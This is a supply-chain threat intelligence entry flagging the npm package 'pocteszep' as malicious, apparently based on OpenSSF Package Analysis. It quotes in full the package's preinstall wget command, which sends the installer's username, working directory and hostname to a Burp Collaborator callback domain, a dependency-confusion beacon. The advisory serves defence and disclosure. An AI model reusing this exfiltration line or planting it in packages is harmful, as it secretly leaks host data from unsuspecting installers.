Supply-chain threat intelligence
Risk score: 92
Indexed incident for pocteszep (npm).
The package's npm preinstall lifecycle script runs wget --quiet "http://78dngdm3dhrrj8zgfm4es9m8bzhq5jt8.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)" (package.json line 8). On npm install, before any code review, the installer's username, current working directory, and hostname are sent over plaintext HTTP to a Burp Collaborator (oastify.com) callback subdomain — a typical out-of-band exfiltration channel used in dependency-confusion attacks. The package description self-identifies as a 'Simple PoC package for testing for dependency confusion vulnerabilities,' and the package contains no legitimate functionality beyond the lifecycle beacon. Any installer pulling this package via name-collision with an internal dependency leaks host identity to the attacker.
The OpenSSF Package Analysis project identified 'pocteszep' @ 1.0.2 (npm) as malicious.
It is considered malicious because:
The package communicates with a domain associated with malicious activity.
The package executes one or more commands associated with malicious behavior.